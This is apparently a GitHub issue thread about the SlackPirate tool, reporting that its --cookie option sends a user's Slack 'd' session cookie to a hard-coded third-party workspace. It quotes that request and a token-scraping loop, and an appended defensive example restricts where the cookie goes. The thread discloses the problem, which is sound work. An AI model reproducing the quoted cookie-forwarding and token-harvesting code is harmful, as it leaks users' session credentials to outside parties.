Cookie Harvesting on https://slackpirate-donotuse.slack.com ?? #58

Open
jsmith449 opened this issue May 26, 2021 · 1 comment

@jsmith449

When you use the --cookie option, it sends the d cookie to https://slackpirate-donotuse.slack.com

It is not clear from the readme that this will happen, and what, if anything, in that Slack workspace captures all the d cookies submitted.

  • Consider updating the readme to make it clear how the d cookie is used when the --cookie option is specified
  • Is there a way to add transparency to the contents of the slackpirate-donotuse workspace?
@apiwoni

apiwoni commented Sep 7, 2023

Just look at this code snippet:

```python
import re
import requests

# ALREADY_SIGNED_IN_TEAM_REGEX and SLACK_API_TOKEN_REGEX are defined elsewhere in the script.
r = requests.get("https://slackpirate-donotuse.slack.com", cookies=cookie)  # the user's d cookie is sent to this third-party workspace
already_signed_in_match = set(re.findall(ALREADY_SIGNED_IN_TEAM_REGEX, str(r.content)))
if already_signed_in_match:
    for workspace in already_signed_in_match:
        r = requests.get("https://" + workspace + "/customize/emoji", cookies=cookie)
        regex_tokens = re.findall(SLACK_API_TOKEN_REGEX, str(r.content))
```

Doesn't it look suspicious to anyone that the call to https://slackpirate-donotuse.slack.com to get the workspace could be replaced by an additional argument where the user passes the workspace? There should be no need to pass your cookie to strangers!

It seems like this guy specializes in security, so perhaps he was testing how many suckers would run an unverified Python script!
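Both the opening report and the comment above describe the same concern: the `d` cookie is attached to a request for a hard-coded third-party workspace instead of one the user names. The following is an added example written for this page, not SlackPirate's own code, of the "workspace as an argument" approach the comment suggests. It builds the request with the standard library only and never sends it, so it runs offline; the host pattern for a Slack workspace, the function names, the guard exception and the `xoxd-EXAMPLE` cookie value are all assumptions and constructed inputs, not taken from the project.

```python
"""Added example: attach the Slack `d` cookie only to the workspace the user names.

Not SlackPirate's code. Function names, the workspace-host pattern and the
sample cookie value are assumptions made for this illustration.
"""
import re
import urllib.parse
import urllib.request

# Hypothetical constant mirroring the hard-coded host in the snippet quoted above.
THIRD_PARTY_HOST = "slackpirate-donotuse.slack.com"

# Assumption: a workspace host is one DNS label followed by ".slack.com".
WORKSPACE_HOST_RE = re.compile(r"^[a-z0-9][a-z0-9-]{0,62}\.slack\.com$")


class CookieLeak(Exception):
    """Raised when a cookie would be sent to a host the user did not name."""


def normalize_workspace(workspace: str) -> str:
    """Turn 'acme', 'acme.slack.com' or 'https://acme.slack.com/' into a host.

    Anything that is not exactly <label>.slack.com is rejected, so a value such
    as 'acme.slack.com.attacker.example' cannot slip through.
    """
    host = workspace.strip().lower()
    host = re.sub(r"^https?://", "", host).split("/")[0]
    if "." not in host:
        host += ".slack.com"
    if not WORKSPACE_HOST_RE.match(host):
        raise ValueError(f"not a Slack workspace host: {host!r}")
    return host


def assert_cookie_destination(req: urllib.request.Request, allowed_host: str) -> None:
    """Guard: a request carrying a Cookie header may only target allowed_host."""
    if req.has_header("Cookie") and req.host != allowed_host:
        raise CookieLeak(f"refusing to send cookie to {req.host!r}, expected {allowed_host!r}")


def build_cookie_request(workspace: str, d_cookie: str,
                         path: str = "/customize/emoji") -> urllib.request.Request:
    """Build (but do not send) the emoji-page request for the user's own workspace.

    The cookie is attached only after the destination host has been checked
    against the workspace the user supplied on the command line.
    """
    host = normalize_workspace(workspace)
    req = urllib.request.Request(f"https://{host}{path}",
                                 headers={"Cookie": f"d={d_cookie}"})
    assert_cookie_destination(req, host)
    return req


def would_leak(user_workspace: str, url: str) -> bool:
    """True if a cookie-bearing request to `url` would reach a host other than
    the workspace the user named, which is the situation the thread describes."""
    allowed = normalize_workspace(user_workspace)
    return urllib.parse.urlsplit(url).hostname != allowed


if __name__ == "__main__":
    # Constructed input: a user-supplied workspace and a made-up cookie value.
    user_ws, cookie = "acme", "xoxd-EXAMPLE"
    req = build_cookie_request(user_ws, cookie)
    print("cookie goes to:", req.full_url)
    print("original flow would leak to third party:",
          would_leak(user_ws, f"https://{THIRD_PARTY_HOST}"))
```

With the workspace taken from the user, the first `requests.get` in the quoted snippet becomes unnecessary; the cookie travels only to the host the user typed, and `would_leak` shows how the hard-coded host fails that check.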
